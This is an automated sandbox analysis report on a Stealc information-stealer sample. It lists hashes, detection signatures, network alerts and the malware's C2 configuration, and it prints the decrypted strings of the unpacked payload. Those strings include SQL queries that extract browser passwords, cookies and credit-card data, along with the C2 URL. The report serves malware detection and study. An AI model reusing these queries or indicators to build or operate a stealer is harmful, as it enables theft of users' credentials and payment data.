Edit tour

Windows Analysis Report
ief722WreR.exe

Overview

General Information

Sample name:	ief722WreR.exe renamed because original name is a hash value
Original sample name:	0b9795bc5978c62899793b157271e979.exe
Analysis ID:	1572568
MD5:	0b9795bc5978c62899793b157271e979
SHA1:	d31405a2caf535d882fe873473df1badd7d5d028
SHA256:	60af68dc8e940dae29691baa206ab9638bcff227b814c6cc33420edc0b3ac80b
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ief722WreR.exe (PID: 3076 cmdline: "C:\Users\user\Desktop\ief722WreR.exe" MD5: 0B9795BC5978C62899793B157271E979)

DADE.tmp.exe (PID: 564 cmdline: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" MD5: 017E73F6839555AA663A62235A81B433)

WerFault.exe (PID: 1252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x16a8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xc60:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: DADE.tmp.exe PID: 564	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: DADE.tmp.exe PID: 564	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.DADE.tmp.exe.9d0e67.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
8.2.DADE.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
8.3.DADE.tmp.exe.24e0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
8.2.DADE.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
8.3.DADE.tmp.exe.24e0000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
8.2.DADE.tmp.exe.9d0e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe, ParentCommandLine: "C:\Users\user\Desktop\ief722WreR.exe", ParentImage: C:\Users\user\Desktop\ief722WreR.exe, ParentProcessId: 3076, ParentProcessName: ief722WreR.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" , ProcessId: 564, ProcessName: DADE.tmp.exe

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T17:42:14.485107+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49702	92.255.57.89	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T17:42:07.594849+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49699	104.21.56.70	443	TCP
2024-12-10T17:42:09.220979+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49700	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://92.255.57.89/45c616e921a794b8.phpQ	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	Avira URL Cloud: Label: malware
Source: http://92.255.57.89	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpwininit.exe	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dlll	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/2b	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpE	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: ief722WreR.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ief722WreR.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 26
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 12
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 20
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 24
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Sleep
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: user32.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sscanf
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: http://92.255.57.89
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: /45c616e921a794b8.php
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: /697b92cb4e247842/
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: default
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HeapFree
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Process32Next
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Process32First
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: LocalFree
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: FindClose
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ReadFile
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: WriteFile
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetLastError
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SelectObject
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BitBlt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GdipFree
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetDC
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: StrStrA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RmGetList
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: PATH
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: browser:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: profile:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: url:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: login:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: password:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Opera
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: OperaGX
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Network
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: cookies
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: .txt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: TRUE
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: FALSE
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: autofill
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: history
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: cc
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: name:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: month:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: year:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: card:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Cookies
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Login Data
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Web Data
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: History
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: logins.json
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: usernameField
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: guid
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: plugins
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Sync Extension Settings
